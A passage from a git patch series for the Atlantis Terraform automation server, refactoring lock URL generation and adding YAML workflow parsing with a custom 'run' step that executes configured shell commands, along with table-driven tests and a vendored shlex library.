1}}, - }, nil) - - res := p.Execute(&ctx, "", project) - Equals(t, "This project is currently locked by #1. The locking plan must be applied or discarded before future plans can execute.", res.ProjectResult.Failure) -} - -func TestExecute_ConfigErr(t *testing.T) { - t.Log("when there is an error loading config, we return it") - p, l, _, _ := setupPreExecuteTest(t) - When(l.TryLock(project, "", ctx.Pull, ctx.User)).ThenReturn(locking.TryLockResponse{ - LockAcquired: true, - }, nil) - When(p.ConfigReader.Exists("")).ThenReturn(true) - When(p.ConfigReader.Read("")).ThenReturn(events.ProjectConfig{}, errors.New("err")) - - res := p.Execute(&ctx, "", project) - Equals(t, "err", res.ProjectResult.Error.Error()) -} - -func TestExecute_PreInitErr(t *testing.T) { - t.Log("when the project is on tf >= 0.9 and we run a `pre_init` that returns an error we return it") - p, l, tm, r := setupPreExecuteTest(t) - When(l.TryLock(project, "", ctx.Pull, ctx.User)).ThenReturn(locking.TryLockResponse{ - LockAcquired: true, - }, nil) - When(p.ConfigReader.Exists("")).ThenReturn(true) - When(p.ConfigReader.Read("")).ThenReturn(events.ProjectConfig{ - PreInit: []string{"pre-init"}, - }, nil) - tfVersion, _ := version.NewVersion("0.9.0") - When(tm.Version()).ThenReturn(tfVersion) - When(r.Execute(ctx.Log, []string{"pre-init"}, "", "", tfVersion, "pre_init")).ThenReturn("", errors.New("err")) - - res := p.Execute(&ctx, "", project) - Equals(t, "running pre_init commands: err", res.ProjectResult.Error.Error()) -} - -func TestExecute_InitErr(t *testing.T) { - t.Log("when the project is on tf >= 0.9 and we run `init` that returns an error we return it") - p, l, tm, _ := setupPreExecuteTest(t) - When(l.TryLock(project, "", ctx.Pull, ctx.User)).ThenReturn(locking.TryLockResponse{ - LockAcquired: true, - }, nil) - When(p.ConfigReader.Exists("")).ThenReturn(true) - When(p.ConfigReader.Read("")).ThenReturn(events.ProjectConfig{}, nil) - tfVersion, _ := version.NewVersion("0.9.0") - When(tm.Version()).ThenReturn(tfVersion) - When(tm.Init(ctx.Log, "", "", nil, tfVersion)).ThenReturn(nil, errors.New("err")) - - res := p.Execute(&ctx, "", project) - Equals(t, "err", res.ProjectResult.Error.Error()) -} - -func TestExecute_PreGetErr(t *testing.T) { - t.Log("when the project is on tf < 0.9 and we run a `pre_get` that returns an error we return it") - p, l, tm, r := setupPreExecuteTest(t) - When(l.TryLock(project, "", ctx.Pull, ctx.User)).ThenReturn(locking.TryLockResponse{ - LockAcquired: true, - }, nil) - When(p.ConfigReader.Exists("")).ThenReturn(true) - When(p.ConfigReader.Read("")).ThenReturn(events.ProjectConfig{ - PreGet: []string{"pre-get"}, - }, nil) - tfVersion, _ := version.NewVersion("0.8") - When(tm.Version()).ThenReturn(tfVersion) - When(r.Execute(ctx.Log, []string{"pre-get"}, "", "", tfVersion, "pre_get")).ThenReturn("", errors.New("err")) - - res := p.Execute(&ctx, "", project) - Equals(t, "running pre_get commands: err", res.ProjectResult.Error.Error()) -} - -func TestExecute_GetErr(t *testing.T) { - t.Log("when the project is on tf < 0.9 and we run `get` that returns an error we return it") - p, l, tm, _ := setupPreExecuteTest(t) - When(l.TryLock(project, "", ctx.Pull, ctx.User)).ThenReturn(locking.TryLockResponse{ - LockAcquired: true, - }, nil) - When(p.ConfigReader.Exists("")).ThenReturn(true) - When(p.ConfigReader.Read("")).ThenReturn(events.ProjectConfig{}, nil) - tfVersion, _ := version.NewVersion("0.8") - When(tm.Version()).ThenReturn(tfVersion) - When(tm.RunCommandWithVersion(ctx.Log, "", []string{"get", "-no-color"}, tfVersion, "")).ThenReturn("", errors.New("err")) - - res := p.Execute(&ctx, "", project) - Equals(t, "err", res.ProjectResult.Error.Error()) -} - -func TestExecute_PreCommandErr(t *testing.T) { - t.Log("when we get an error running pre commands we return it") - p, l, tm, r := setupPreExecuteTest(t) - When(l.TryLock(project, "", ctx.Pull, ctx.User)).ThenReturn(locking.TryLockResponse{ - LockAcquired: true, - }, nil) - When(p.ConfigReader.Exists("")).ThenReturn(true) - When(p.ConfigReader.Read("")).ThenReturn(events.ProjectConfig{ - PrePlan: []string{"command"}, - }, nil) - tfVersion, _ := version.NewVersion("0.9") - When(tm.Version()).ThenReturn(tfVersion) - When(tm.Init(ctx.Log, "", "", nil, tfVersion)).ThenReturn(nil, nil) - When(r.Execute(ctx.Log, []string{"command"}, "", "", tfVersion, "pre_plan")).ThenReturn("", errors.New("err")) - - res := p.Execute(&ctx, "", project) - Equals(t, "running pre_plan commands: err", res.ProjectResult.Error.Error()) -} - -func TestExecute_SuccessTF9(t *testing.T) { - t.Log("when the project is on tf >= 0.9 it should be successful") - p, l, tm, r := setupPreExecuteTest(t) - lockResponse := locking.TryLockResponse{ - LockAcquired: true, - } - When(l.TryLock(project, "", ctx.Pull, ctx.User)).ThenReturn(lockResponse, nil) - When(p.ConfigReader.Exists("")).ThenReturn(true) - config := events.ProjectConfig{ - PreInit: []string{"pre-init"}, - } - When(p.ConfigReader.Read("")).ThenReturn(config, nil) - tfVersion, _ := version.NewVersion("0.9") - When(tm.Version()).ThenReturn(tfVersion) - When(tm.Init(ctx.Log, "", "", nil, tfVersion)).ThenReturn(nil, nil) - - res := p.Execute(&ctx, "", project) - Equals(t, events.PreExecuteResult{ - ProjectConfig: config, - TerraformVersion: tfVersion, - LockResponse: lockResponse, - }, res) - tm.VerifyWasCalledOnce().Init(ctx.Log, "", "", nil, tfVersion) - r.VerifyWasCalledOnce().Execute(ctx.Log, []string{"pre-init"}, "", "", tfVersion, "pre_init") -} - -func TestExecute_SuccessTF8(t *testing.T) { - t.Log("when the project is on tf < 0.9 it should be successful") - p, l, tm, r := setupPreExecuteTest(t) - lockResponse := locking.TryLockResponse{ - LockAcquired: true, - } - When(l.TryLock(project, "", ctx.Pull, ctx.User)).ThenReturn(lockResponse, nil) - When(p.ConfigReader.Exists("")).ThenReturn(true) - config := events.ProjectConfig{ - PreGet: []string{"pre-get"}, - } - When(p.ConfigReader.Read("")).ThenReturn(config, nil) - tfVersion, _ := version.NewVersion("0.8") - When(tm.Version()).ThenReturn(tfVersion) - - res := p.Execute(&ctx, "", project) - Equals(t, events.PreExecuteResult{ - ProjectConfig: config, - TerraformVersion: tfVersion, - LockResponse: lockResponse, - }, res) - tm.VerifyWasCalledOnce().RunCommandWithVersion(ctx.Log, "", []string{"get", "-no-color"}, tfVersion, "") - r.VerifyWasCalledOnce().Execute(ctx.Log, []string{"pre-get"}, "", "", tfVersion, "pre_get") -} - -func TestExecute_SuccessPrePlan(t *testing.T) { - t.Log("when there are pre_plan commands they are run") - p, l, tm, r := setupPreExecuteTest(t) - lockResponse := locking.TryLockResponse{ - LockAcquired: true, - } - When(l.TryLock(project, "", ctx.Pull, ctx.User)).ThenReturn(lockResponse, nil) - When(p.ConfigReader.Exists("")).ThenReturn(true) - config := events.ProjectConfig{ - PrePlan: []string{"command"}, - } - When(p.ConfigReader.Read("")).ThenReturn(config, nil) - tfVersion, _ := version.NewVersion("0.9") - When(tm.Version()).ThenReturn(tfVersion) - - res := p.Execute(&ctx, "", project) - Equals(t, events.PreExecuteResult{ - ProjectConfig: config, - TerraformVersion: tfVersion, - LockResponse: lockResponse, - }, res) - r.VerifyWasCalledOnce().Execute(ctx.Log, []string{"command"}, "", "", tfVersion, "pre_plan") -} - -func TestExecute_SuccessPreApply(t *testing.T) { - t.Log("when there are pre_apply commands they are run") - p, l, tm, r := setupPreExecuteTest(t) - lockResponse := locking.TryLockResponse{ - LockAcquired: true, - } - When(l.TryLock(project, "", ctx.Pull, ctx.User)).ThenReturn(lockResponse, nil) - When(p.ConfigReader.Exists("")).ThenReturn(true) - config := events.ProjectConfig{ - PreApply: []string{"command"}, - } - When(p.ConfigReader.Read("")).ThenReturn(config, nil) - tfVersion, _ := version.NewVersion("0.9") - When(tm.Version()).ThenReturn(tfVersion) - - cpCtx := deepcopy.Copy(ctx).(events.CommandContext) - cpCtx.Command = &events.Command{ - Name: events.Apply, - } - cpCtx.Log = logging.NewNoopLogger() - - res := p.Execute(&cpCtx, "", project) - Equals(t, events.PreExecuteResult{ - ProjectConfig: config, - TerraformVersion: tfVersion, - LockResponse: lockResponse, - }, res) - r.VerifyWasCalledOnce().Execute(cpCtx.Log, []string{"command"}, "", "", tfVersion, "pre_apply") -} - -func setupPreExecuteTest(t *testing.T) (*events.DefaultProjectPreExecutor, *lmocks.MockLocker, *tmocks.MockClient, *rmocks.MockRunner) { - RegisterMockTestingT(t) - l := lmocks.NewMockLocker() - cr := mocks.NewMockProjectConfigReader() - tm := tmocks.NewMockClient() - r := rmocks.NewMockRunner() - return &events.DefaultProjectPreExecutor{ - Locker: l, - ConfigReader: cr, - Terraform: tm, - Run: r, - }, l, tm, r -} diff --git a/server/router.go b/server/router.go new file mode 100644 index 0000000000..af9319b987 --- /dev/null +++ b/server/router.go @@ -0,0 +1,31 @@ +package server + +import ( + "fmt" + "net/url" + + "github.com/gorilla/mux" +) + +// Router can be used to retrieve Atlantis URLs. It acts as an intermediary +// between the underlying router and the rest of Atlantis that might need to +// know URLs to different resources. +type Router struct { + // Underlying is the router that the routes have been constructed on. + Underlying *mux.Router + // LockViewRouteName is the named route for the lock view that can be Get'd + // from the Underlying router. + LockViewRouteName string + // LockViewRouteIDQueryParam is the query parameter needed to construct the + // lock view: underlying.Get(LockViewRouteName).URL(LockViewRouteIDQueryParam, "my id"). + LockViewRouteIDQueryParam string + // AtlantisURL is the fully qualified URL (scheme included) that Atlantis is + // being served at, ex: https://example.com. + AtlantisURL string +} + +// GenerateLockURL returns a fully qualified URL to view the lock at lockID. +func (r *Router) GenerateLockURL(lockID string) string { + path, _ := r.Underlying.Get(r.LockViewRouteName).URL(r.LockViewRouteIDQueryParam, url.QueryEscape(lockID)) + return fmt.Sprintf("%s%s", r.AtlantisURL, path) +} diff --git a/server/server.go b/server/server.go index ee0ffdf119..e53de94a11 100644 --- a/server/server.go +++ b/server/server.go @@ -36,6 +36,7 @@ import ( "github.com/runatlantis/atlantis/server/events/locking" "github.com/runatlantis/atlantis/server/events/locking/boltdb" "github.com/runatlantis/atlantis/server/events/models" + "github.com/runatlantis/atlantis/server/events/repoconfig" "github.com/runatlantis/atlantis/server/events/run" "github.com/runatlantis/atlantis/server/events/terraform" "github.com/runatlantis/atlantis/server/events/vcs" @@ -46,7 +47,16 @@ import ( "github.com/urfave/negroni" ) -const LockRouteName = "lock-detail" +const ( + // LockViewRouteName is the named route in mux.Router for the lock view. + // The route can be retrieved by this name, ex: + // mux.Router.Get(LockViewRouteName) + LockViewRouteName = "lock-detail" + // LockViewRouteIDQueryParam is the query parameter needed to construct the lock view + // route. ex: + // mux.Router.Get(LockViewRouteName).URL(LockViewRouteIDQueryParam, "my id") + LockViewRouteIDQueryParam = "id" +) // Server runs the Atlantis web server. type Server struct { @@ -184,29 +194,44 @@ func NewServer(userConfig UserConfig, config Config) (*Server, error) { workspace := &events.FileWorkspace{ DataDir: userConfig.DataDir, } - projectPreExecute := &events.DefaultProjectPreExecutor{ + projectLocker := &events.DefaultProjectLocker{ Locker: lockingClient, Run: run, ConfigReader: configReader, Terraform: terraformClient, } + executionPlanner := &repoconfig.ExecutionPlanner{ + ConfigReader: &repoconfig.Reader{}, + DefaultTFVersion: terraformClient.Version(), + TerraformExecutor: terraformClient, + } + underlyingRouter := mux.NewRouter() + router := &Router{ + AtlantisURL: userConfig.AtlantisURL, + LockViewRouteIDQueryParam: LockViewRouteIDQueryParam, + LockViewRouteName: LockViewRouteName, + Underlying: underlyingRouter, + } applyExecutor := &events.ApplyExecutor{ VCSClient: vcsClient, Terraform: terraformClient, RequireApproval: userConfig.RequireApproval, Run: run, AtlantisWorkspace: workspace, - ProjectPreExecute: projectPreExecute, + ProjectLocker: projectLocker, + ExecutionPlanner: executionPlanner, Webhooks: webhooksManager, } planExecutor := &events.PlanExecutor{ - VCSClient: vcsClient, - Terraform: terraformClient, - Run: run, - Workspace: workspace, - ProjectPreExecute: projectPreExecute, - Locker: lockingClient, - ProjectFinder: &events.DefaultProjectFinder{}, + VCSClient: vcsClient, + Terraform: terraformClient, + Run: run, + Workspace: workspace, + ProjectLocker: projectLocker, + Locker: lockingClient, + ProjectFinder: &events.DefaultProjectFinder{}, + ExecutionPlanner: executionPlanner, + LockURLGenerator: router, } pullClosedExecutor := &events.PullClosedExecutor{ VCSClient: vcsClient, @@ -229,7 +254,6 @@ func NewServer(userConfig UserConfig, config Config) (*Server, error) { commandHandler := &events.CommandHandler{ ApplyExecutor: applyExecutor, PlanExecutor: planExecutor, - LockURLGenerator: planExecutor, EventParser: eventParser, VCSClient: vcsClient, GithubPullGetter: githubClient, @@ -265,10 +289,9 @@ func NewServer(userConfig UserConfig, config Config) (*Server, error) { SupportedVCSHosts: supportedVCSHosts, VCSClient: vcsClient, } - router := mux.NewRouter() return &Server{ AtlantisVersion: config.AtlantisVersion, - Router: router, + Router: underlyingRouter, Port: userConfig.Port, CommandHandler: commandHandler, Logger: logger, @@ -291,14 +314,7 @@ func (s *Server) Start() error { s.Router.PathPrefix("/static/").Handler(http.FileServer(&assetfs.AssetFS{Asset: static.Asset, AssetDir: static.AssetDir, AssetInfo: static.AssetInfo})) s.Router.HandleFunc("/events", s.EventsController.Post).Methods("POST") s.Router.HandleFunc("/locks", s.LocksController.DeleteLock).Methods("DELETE").Queries("id", "{id:.*}") - lockRoute := s.Router.HandleFunc("/lock", s.LocksController.GetLock).Methods("GET").Queries("id", "{id}").Name(LockRouteName) - // function that planExecutor can use to construct detail view url - // injecting this here because this is the earliest routes are created - s.CommandHandler.SetLockURL(func(lockID string) string { - // ignoring error since guaranteed to succeed if "id" is specified - u, _ := lockRoute.URL("id", url.QueryEscape(lockID)) - return s.AtlantisURL + u.RequestURI() - }) + s.Router.HandleFunc("/lock", s.LocksController.GetLock).Methods("GET").Queries(LockViewRouteIDQueryParam, "{id}").Name(LockViewRouteName) n := negroni.New(&negroni.Recovery{ Logger: log.New(os.Stdout, "", log.LstdFlags), PrintStack: false, @@ -349,7 +365,7 @@ func (s *Server) Index(w http.ResponseWriter, _ *http.Request) { var lockResults []LockIndexData for id, v := range locks { - lockURL, _ := s.Router.Get(LockRouteName).URL("id", url.QueryEscape(id)) + lockURL, _ := s.Router.Get(LockViewRouteName).URL("id", url.QueryEscape(id)) lockResults = append(lockResults, LockIndexData{ LockURL: lockURL.String(), RepoFullName: v.Project.RepoFullName, diff --git a/server/server_test.go b/server/server_test.go index aba146ef54..54776cfe9e 100644 --- a/server/server_test.go +++ b/server/server_test.go @@ -78,7 +78,7 @@ func TestIndex_Success(t *testing.T) { r := mux.NewRouter() atlantisVersion := "0.3.1" // Need to create a lock route since the server expects this route to exist. - r.NewRoute().Path("").Name(server.LockRouteName) + r.NewRoute().Path("").Name(server.LockViewRouteName) s := server.Server{ Locker: l, IndexTemplate: it, From aef8a632c3b86f716a098934bacd84b3836281f1 Mon Sep 17 00:00:00 2001 From: Luke Kysow Date: Wed, 6 Jun 2018 18:54:27 +0100 Subject: [PATCH 11/69] Make tests more readable --- server/events/repoconfig/reader.go | 3 +- server/events/repoconfig/reader_test.go | 73 ++++++++++++++++--------- 2 files changed, 47 insertions(+), 29 deletions(-) diff --git a/server/events/repoconfig/reader.go b/server/events/repoconfig/reader.go index 77d4e505dc..7f2557e42d 100644 --- a/server/events/repoconfig/reader.go +++ b/server/events/repoconfig/reader.go @@ -18,8 +18,7 @@ const ApplyStageName = "apply" type Reader struct{} // ReadConfig returns the parsed and validated config for repoDir. -// If there was no config, it returns a nil pointer. If there was an error -// in parsing it returns the error. +// If there was no config, it returns a nil pointer. func (r *Reader) ReadConfig(repoDir string) (*RepoConfig, error) { configFile := filepath.Join(repoDir, AtlantisYAMLFilename) configData, err := ioutil.ReadFile(configFile) diff --git a/server/events/repoconfig/reader_test.go b/server/events/repoconfig/reader_test.go index 20e36c9cf6..9d0eb5d962 100644 --- a/server/events/repoconfig/reader_test.go +++ b/server/events/repoconfig/reader_test.go @@ -80,14 +80,16 @@ func TestReadConfig_Invalid(t *testing.T) { // Invalid version. { description: "no version", - input: `projects: + input: ` +projects: - dir: "." `, expErr: "unknown version: must have \"version: 2\" set", }, { description: "unsupported version", - input: `version: 0 + input: ` +version: 0 projects: - dir: "." `, @@ -95,7 +97,8 @@ projects: }, { description: "empty version", - input: `version: ~ + input: ` +version: ~ projects: - dir: "." `, @@ -110,7 +113,8 @@ projects: }, { description: "empty projects list", - input: `version: 2 + input: ` +version: 2 projects:`, expErr: "'projects' key must exist and contain at least one element", }, @@ -118,41 +122,45 @@ projects:`, // Project must have dir set. { description: "project with no config", - input: `version: 2 + input: ` +version: 2 projects: -`, expErr: "project at index 0 invalid: dir key must be set and non-empty", }, { description: "project without dir set", - input: `version: 2 + input: ` +version: 2 projects: - workspace: "staging"`, expErr: "project at index 0 invalid: dir key must be set and non-empty", }, { description: "project with dir set to empty string", - input: `version: 2 + input: ` +version: 2 projects: - dir: ""`, expErr: "project at index 0 invalid: dir key must be set and non-empty", }, { description: "project with no config at index 1", - input: `version: 2 + input: ` +version: 2 projects: - dir: "." -`, expErr: "project at index 1 invalid: dir key must be set and non-empty", }, - // { - // "project with unknown key", - // `version: 2 - //projects: - //- unknown: value`, - // // todo: fix this test case - // "project at index 1 invalid: dir key must be set and non-empty", - // }, + { + description: "project with unknown key", + input: ` +version: 2 +projects: +- unknown: value`, + expErr: "yaml: unmarshal errors:\n line 4: field unknown not found in struct repoconfig.alias", + }, // todo: more test cases // project workflow doesn't exist @@ -311,7 +319,8 @@ func TestReadConfig_Successes(t *testing.T) { }{ { description: "uses project defaults", - input: `version: 2 + input: ` +version: 2 projects: - dir: "."`, expOutput: repoconfig.RepoConfig{ @@ -321,7 +330,8 @@ projects: }, { description: "autoplan is enabled by default", - input: `version: 2 + input: ` +version: 2 projects: - dir: "." auto_plan: @@ -334,7 +344,8 @@ projects: }, { description: "if workflows not defined, there are none", - input: `version: 2 + input: ` +version: 2 projects: - dir: "." `, @@ -345,7 +356,8 @@ projects: }, { description: "if workflows key set but with no workflows there are none", - input: `version: 2 + input: ` +version: 2 projects: - dir: "." workflows: ~ @@ -357,7 +369,8 @@ workflows: ~ }, { description: "if a workflow is defined but set to null we use the defaults", - input: `version: 2 + input: ` +version: 2 projects: - dir: "." workflows: @@ -391,7 +404,8 @@ workflows: }, { description: "if a plan or apply has no steps defined then we use the defaults", - input: `version: 2 + input: ` +version: 2 projects: - dir: "." workflows: @@ -427,7 +441,8 @@ workflows: }, { description: "if a plan or apply has no steps defined then we use the defaults", - input: `version: 2 + input: ` +version: 2 projects: - dir: "." workflows: @@ -463,7 +478,8 @@ workflows: }, { description: "if a plan or apply explicitly defines an empty steps key then there are no steps", - input: `version: 2 + input: ` +version: 2 projects: - dir: "." workflows: @@ -490,7 +506,8 @@ workflows: }, { description: "if a plan or apply explicitly defines an empty steps key then there are no steps", - input: `version: 2 + input: ` +version: 2 projects: - dir: "." workflows: @@ -517,7 +534,8 @@ workflows: }, { description: "if steps are set then we parse them properly", - input: `version: 2 + input: ` +version: 2 projects: - dir: "." workflows: @@ -554,7 +572,8 @@ workflows: }, { description: "we parse extra_args for the steps", - input: `version: 2 + input: ` +version: 2 projects: - dir: "." workflows: From d06f3ca3d259b6ea54a6ca15d992c68655367744 Mon Sep 17 00:00:00 2001 From: Luke Kysow Date: Wed, 6 Jun 2018 22:12:30 +0100 Subject: [PATCH 12/69] Implement custom run step --- Gopkg.lock | 8 +- Gopkg.toml | 4 + server/events/plan_executor.go | 2 +- server/events/repoconfig/config.go | 39 +- server/events/repoconfig/execution_planner.go | 6 +- server/events/repoconfig/reader_test.go | 133 ++--- server/events/repoconfig/run_step.go | 35 ++ server/events/repoconfig/run_step_test.go | 3 + .../github.com/flynn-archive/go-shlex/COPYING | 202 ++++++++ .../flynn-archive/go-shlex/Makefile | 21 + .../flynn-archive/go-shlex/README.md | 2 + .../flynn-archive/go-shlex/shlex.go | 457 ++++++++++++++++++ .../flynn-archive/go-shlex/shlex_test.go | 162 +++++++ 13 files changed, 1009 insertions(+), 65 deletions(-) create mode 100644 server/events/repoconfig/run_step.go create mode 100644 server/events/repoconfig/run_step_test.go create mode 100644 vendor/github.com/flynn-archive/go-shlex/COPYING create mode 100644 vendor/github.com/flynn-archive/go-shlex/Makefile create mode 100644 vendor/github.com/flynn-archive/go-shlex/README.md create mode 100644 vendor/github.com/flynn-archive/go-shlex/shlex.go create mode 100644 vendor/github.com/flynn-archive/go-shlex/shlex_test.go diff --git a/Gopkg.lock b/Gopkg.lock index 9b1d483313..19c0ad71bb 100644 --- a/Gopkg.lock +++ b/Gopkg.lock @@ -25,6 +25,12 @@ revision = "570b54cabe6b8eb0bc2dfce68d964677d63b5260" version = "v1.5.0" +[[projects]] + branch = "master" + name = "github.com/flynn-archive/go-shlex" + packages = ["."] + revision = "3f9db97f856818214da2e1057f8ad84803971cff" + [[projects]] name = "github.com/fsnotify/fsnotify" packages = ["."] @@ -282,6 +288,6 @@ [solve-meta] analyzer-name = "dep" analyzer-version = 1 - inputs-digest = "4e5fea92b65446bbdeccbdedfb28fb9c2ea21325b0335b3a4e7b98b60d47ccd6" + inputs-digest = "6e38170b3ac78890d7f3af87171bc9ccf81083b5196342b2f5acea10125872bd" solver-name = "gps-cdcl" solver-version = 1 diff --git a/Gopkg.toml b/Gopkg.toml index 92f54862f5..749d2f189b 100644 --- a/Gopkg.toml +++ b/Gopkg.toml @@ -92,3 +92,7 @@ [[constraint]] name = "github.com/go-test/deep" version = "1.0.1" + +[[constraint]] + branch = "master" + name = "github.com/flynn-archive/go-shlex" diff --git a/server/events/plan_executor.go b/server/events/plan_executor.go index d994021723..4983c17701 100644 --- a/server/events/plan_executor.go +++ b/server/events/plan_executor.go @@ -30,7 +30,7 @@ type LockURLGenerator interface { GenerateLockURL(lockID string) string } -/**/ // PlanExecutor handles everything related to running terraform plan. +// PlanExecutor handles everything related to running terraform plan. type PlanExecutor struct { VCSClient vcs.ClientProxy Terraform terraform.Client diff --git a/server/events/repoconfig/config.go b/server/events/repoconfig/config.go index 48a0a9e388..acdc7a0ce6 100644 --- a/server/events/repoconfig/config.go +++ b/server/events/repoconfig/config.go @@ -1,6 +1,11 @@ package repoconfig -import "fmt" +import ( + "fmt" + + "github.com/flynn-archive/go-shlex" + "github.com/pkg/errors" +) type RepoConfig struct { Version int `yaml:"version"` @@ -61,6 +66,16 @@ type Workflow struct { } func (p *Workflow) UnmarshalYAML(unmarshal func(interface{}) error) error { + // Check if they forgot to set the "steps" key. + type MissingSteps struct { + Apply []interface{} + Plan []interface{} + } + var missingSteps MissingSteps + if err := unmarshal(&missingSteps); err == nil { + return errors.New("missing \"steps\" key") + } + // Use a type alias so unmarshal doesn't get into an infinite loop. type alias Workflow var tmp alias @@ -103,6 +118,9 @@ type Stage struct { type StepConfig struct { StepType string ExtraArgs []string + // Run will be set if the StepType is "run". This is for custom commands. + // Ex. if the key is `run: echo hi` then Run will be "echo hi". + Run []string } func (s *StepConfig) UnmarshalYAML(unmarshal func(interface{}) error) error { @@ -174,15 +192,20 @@ func (s *StepConfig) UnmarshalYAML(unmarshal func(interface{}) error) error { return validateBuiltIn("apply", applyStep.Apply) } - // todo: run step // Try to unmarshal as a custom run step, ex. // steps: // - run: my command - //var runStep struct { - // Run string `yaml:"run"` - //} - //if err = unmarshal(&runStep); err == nil { - // - //} + var runStep struct { + Run string `yaml:"run"` + } + if err = unmarshal(&runStep); err == nil { + s.StepType = "run" + parts, err := shlex.Split(runStep.Run) + if err != nil { + return err + } + s.Run = parts + } + return err } diff --git a/server/events/repoconfig/execution_planner.go b/server/events/repoconfig/execution_planner.go index 02cba0496f..c94001925e 100644 --- a/server/events/repoconfig/execution_planner.go +++ b/server/events/repoconfig/execution_planner.go @@ -85,8 +85,12 @@ func (s *ExecutionPlanner) buildStage(stageName string, log *logging.SimpleLogge Meta: meta, ExtraArgs: stepConfig.ExtraArgs, } + case "run": + step = &RunStep{ + Meta: meta, + Commands: stepConfig.Run, + } } - // todo: custom step steps = append(steps, step) } return steps, nil diff --git a/server/events/repoconfig/reader_test.go b/server/events/repoconfig/reader_test.go index 9d0eb5d962..02fa41b342 100644 --- a/server/events/repoconfig/reader_test.go +++ b/server/events/repoconfig/reader_test.go @@ -161,7 +161,6 @@ projects: - unknown: value`, expErr: "yaml: unmarshal errors:\n line 4: field unknown not found in struct repoconfig.alias", }, - // todo: more test cases // project workflow doesn't exist // workflow has plan and apply keys (otherwise no point specifying it) @@ -280,6 +279,33 @@ workflows: `, expErr: "expected array of strings as value of extra_args, not \"arg\"", }, + { + description: "invalid step type", + input: ` +version: 2 +projects: +- dir: "." +workflows: + default: + plan: + steps: + - rn: echo should fail +`, + expErr: "yaml: unmarshal errors:\n line 9: field rn not found in struct struct { Run string \"yaml:\\\"run\\\"\" }", + }, + { + description: "missed the steps key and just set an array directly", + input: ` +version: 2 +projects: +- dir: "." +workflows: + default: + plan: + - init +`, + expErr: "missing \"steps\" key", + }, } tmpDir, cleanup := TempDir(t) @@ -408,43 +434,6 @@ workflows: version: 2 projects: - dir: "." -workflows: - default: - plan: - apply: -`, - expOutput: repoconfig.RepoConfig{ - Version: 2, - Projects: basicProjects, - Workflows: map[string]repoconfig.Workflow{ - "default": { - Plan: &repoconfig.Stage{ - Steps: []repoconfig.StepConfig{ - { - StepType: "init", - }, - { - StepType: "plan", - }, - }, - }, - Apply: &repoconfig.Stage{ - Steps: []repoconfig.StepConfig{ - { - StepType: "apply", - }, - }, - }, - }, - }, - }, - }, - { - description: "if a plan or apply has no steps defined then we use the defaults", - input: ` -version: 2 -projects: -- dir: "." workflows: default: plan: @@ -505,7 +494,7 @@ workflows: }, }, { - description: "if a plan or apply explicitly defines an empty steps key then there are no steps", + description: "if steps are set then we parse them properly", input: ` version: 2 projects: @@ -514,8 +503,12 @@ workflows: default: plan: steps: + - init + - plan apply: steps: + - plan # we don't validate if they make sense + - apply `, expOutput: repoconfig.RepoConfig{ Version: 2, @@ -523,17 +516,31 @@ workflows: Workflows: map[string]repoconfig.Workflow{ "default": { Plan: &repoconfig.Stage{ - Steps: nil, + Steps: []repoconfig.StepConfig{ + { + StepType: "init", + }, + { + StepType: "plan", + }, + }, }, Apply: &repoconfig.Stage{ - Steps: nil, + Steps: []repoconfig.StepConfig{ + { + StepType: "plan", + }, + { + StepType: "apply", + }, + }, }, }, }, }, }, { - description: "if steps are set then we parse them properly", + description: "we parse extra_args for the steps", input: ` version: 2 projects: @@ -542,10 +549,18 @@ workflows: default: plan: steps: - - init + - init: + extra_args: [] + - plan: + extra_args: + - arg1 + - arg2 apply: steps: - - plan # we don't validate if they make sense + - plan: + extra_args: [a, b] + - apply: + extra_args: ["a", "b"] `, expOutput: repoconfig.RepoConfig{ Version: 2, @@ -555,14 +570,24 @@ workflows: Plan: &repoconfig.Stage{ Steps: []repoconfig.StepConfig{ { - StepType: "init", + StepType: "init", + ExtraArgs: nil, + }, + { + StepType: "plan", + ExtraArgs: []string{"arg1", "arg2"}, }, }, }, Apply: &repoconfig.Stage{ Steps: []repoconfig.StepConfig{ { - StepType: "plan", + StepType: "plan", + ExtraArgs: []string{"a", "b"}, + }, + { + StepType: "apply", + ExtraArgs: []string{"a", "b"}, }, }, }, @@ -571,7 +596,7 @@ workflows: }, }, { - description: "we parse extra_args for the steps", + description: "custom steps are parsed", input: ` version: 2 projects: @@ -580,12 +605,10 @@ workflows: default: plan: steps: - - init: - extra_args: [] + - run: "echo \"plan hi\"" apply: steps: - - plan: - extra_args: ["a", "b"] + - run: echo apply "arg 2" `, expOutput: repoconfig.RepoConfig{ Version: 2, @@ -595,16 +618,18 @@ workflows: Plan: &repoconfig.Stage{ Steps: []repoconfig.StepConfig{ { - StepType: "init", + StepType: "run", ExtraArgs: nil, + Run: []string{"echo", "plan hi"}, }, }, }, Apply: &repoconfig.Stage{ Steps: []repoconfig.StepConfig{ { - StepType: "plan", - ExtraArgs: []string{"a", "b"}, + StepType: "run", + ExtraArgs: nil, + Run: []string{"echo", "apply", "arg 2"}, }, }, }, diff --git a/server/events/repoconfig/run_step.go b/server/events/repoconfig/run_step.go new file mode 100644 index 0000000000..7a157bb6fb --- /dev/null +++ b/server/events/repoconfig/run_step.go @@ -0,0 +1,35 @@ +package repoconfig + +import ( + "fmt" + "os/exec" + "strings" + + "github.com/pkg/errors" +) + +// RunStep runs custom commands. +type RunStep struct { + Commands []string + Meta StepMeta +} + +func (r *RunStep) Run() (string, error) { + if len(r.Commands) < 1 { + return "", errors.New("no commands for run step") + } + path := r.Meta.AbsolutePath + + cmd := exec.Command("sh", "-c", strings.Join(r.Commands, " ")) // #nosec + cmd.Dir = path + out, err := cmd.CombinedOutput() + + commandStr := strings.Join(r.Commands, " ") + if err != nil { + err = fmt.Errorf("%s: running %q in %q: \n%s", err, commandStr, path, out) + r.Meta.Log.Debug("error: %s", err) + return string(out), err + } + r.Meta.Log.Info("successfully ran %q in %q", commandStr, path) + return string(out), nil +} diff --git a/server/events/repoconfig/run_step_test.go b/server/events/repoconfig/run_step_test.go new file mode 100644 index 0000000000..fdab8a9b5f --- /dev/null +++ b/server/events/repoconfig/run_step_test.go @@ -0,0 +1,3 @@ +package repoconfig + +// todo diff --git a/vendor/github.com/flynn-archive/go-shlex/COPYING b/vendor/github.com/flynn-archive/go-shlex/COPYING new file mode 100644 index 0000000000..d645695673 --- /dev/null +++ b/vendor/github.com/flynn-archive/go-shlex/COPYING @@ -0,0 +1,202 @@ + + Apache License + Version 2.0, January 2004 + http://www.apache.org/licenses/ + + TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION + + 1. Definitions. + + "License" shall mean the terms and conditions for use, reproduction, + and distribution as defined by Sections 1 through 9 of this document. + + 